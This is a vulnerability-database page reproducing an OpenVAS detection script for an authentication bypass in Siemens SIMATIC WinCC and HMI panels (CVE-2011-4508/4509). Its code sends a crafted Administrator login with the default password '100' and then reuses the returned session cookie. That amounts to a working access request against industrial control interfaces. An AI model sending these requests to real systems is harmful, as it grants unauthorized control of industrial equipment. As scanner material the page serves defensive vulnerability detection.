Lucene search
+L

Multiple Siemens SIMATIC Products Authentication Bypass Vulnerabilities

🗓️ 23 Dec 2011 00:00:00Reported by Copyright (C) 2011 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 47 Views

Multiple Siemens SIMATIC Products Authentication Bypass Vulnerabilities. Vulnerabilities in SIMATIC WinCC Flexible 2004 through 2008 SP2, SIMATIC WinCC V11, V11 SP1, and V11 SP2, and SIMATIC HMI TP, OP, MP, Mobile, and Comfort Series Panels allow attackers to bypass authentication and gain unauthorized access. No known solution available

Related
Refs
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
Siemens WinCC and SIMATIC HMI Panels < 11.0.2.1 Authentication Bypass
8 May 201900:00
nessus
Tenable Nessus
Siemens WinCC and SIMATIC HMI Panels Default Password
8 May 201900:00
nessus
Tenable Nessus
Siemens WinCC and SIMATIC HMI Panels < 11.0.2.1 Multiple Vulnerabilities
8 May 201900:00
nessus
CVE
CVE-2011-4508
3 Feb 201220:00
cve
CVE
CVE-2011-4509
3 Feb 201220:00
cve
Cvelist
CVE-2011-4508
3 Feb 201220:00
cvelist
Cvelist
CVE-2011-4509
3 Feb 201220:00
cvelist
EUVD
EUVD-2011-4434
7 Oct 202500:30
euvd
EUVD
EUVD-2011-4435
7 Oct 202500:30
euvd
ICS
Siemens Simatic HMI Authentication Vulnerabilities
24 Sep 201106:00
ics
Rows per page
# SPDX-FileCopyrightText: 2011 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.103372");
  script_cve_id("CVE-2011-4508", "CVE-2011-4509");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_version("2023-07-28T05:05:23+0000");

  script_name("Multiple Siemens SIMATIC Products Authentication Bypass Vulnerabilities");

  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/51177");
  script_xref(name:"URL", value:"http://xs-sniper.com/blog/2011/12/20/the-siemens-simatic-remote-authentication-bypass-that-doesnt-exist/");
  script_xref(name:"URL", value:"http://www.us-cert.gov/control_systems/pdf/ICSA-11-356-01.pdf");

  script_tag(name:"last_modification", value:"2023-07-28 05:05:23 +0000 (Fri, 28 Jul 2023)");
  script_tag(name:"creation_date", value:"2011-12-23 10:42:29 +0100 (Fri, 23 Dec 2011)");
  script_tag(name:"qod_type", value:"remote_vul");
  script_category(ACT_ATTACK);
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2011 Greenbone AG");
  script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_tag(name:"summary", value:"Multiple Siemens SIMATIC products are affected by vulnerabilities that
  allow attackers to bypass authentication.");

  script_tag(name:"impact", value:"An attacker can exploit these issues to bypass intended security
  restrictions and gain access to the affected application. Successfully
  exploiting these issues may lead to further attacks.");

  script_tag(name:"affected", value:"SIMATIC WinCC Flexible 2004 through 2008 SP2 SIMATIC WinCC V11,
  V11 SP1, and V11 SP2 SIMATIC HMI TP, OP, MP, Mobile, and Comfort Series Panels");

  script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure
  of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release,
  disable respective features, remove the product or replace the product by another one.");

  script_tag(name:"solution_type", value:"WillNotFix");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
include("host_details.inc");

port = http_get_port(default:80);

host = http_host_name(port:port);

foreach dir (make_list("/", "/www/")) {

  url = string(dir,"start.html");
  buf = http_get_cache(item:url, port:port);
  if(!buf)
    continue;

  if("miniweb" >< tolower(buf)) {

    req = string(
                 "POST ",dir,"FormLogin HTTP/1.1\r\n",
                 "Host: ",host,"\r\n",
                 "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n",
                 "Accept-Encoding: gzip, deflate\r\n",
                 "Referer: http://",host,"/start.html\r\n",
                 "Content-Type: application/x-www-form-urlencoded\r\n",
                 "Content-Length: 58\r\n",
                 "\r\n",
                 "Login=Administrator&Redirection=%2Fstart.html&Password=100\r\n\r\n");

    result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);

    if("Auth Form Response" >< result) {

      start = eregmatch(string:result, pattern:'url=([^"]+)');
      if(isnull(start[1]))continue;

      co = eregmatch(string:result, pattern:"Set-cookie: ([^,]+)");
      if(isnull(co[1]))continue;

      cookie = co[1];
      url = string(start[1]);

      req = string("GET ", url, " HTTP/1.1\r\n",
                   "Host: ",host,"\r\n",
                   "Cookie: ",cookie," path=/\r\n",
                   "\r\n");
      buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
      if(!buf) continue;

      if("You are logged in" >< buf && "Welcome Administrator" >< buf) {
        security_message(port:port);
        exit(0);
      }
    }
  }
}

exit(0);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Jul 2023 00:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 210
EPSS0.03119
47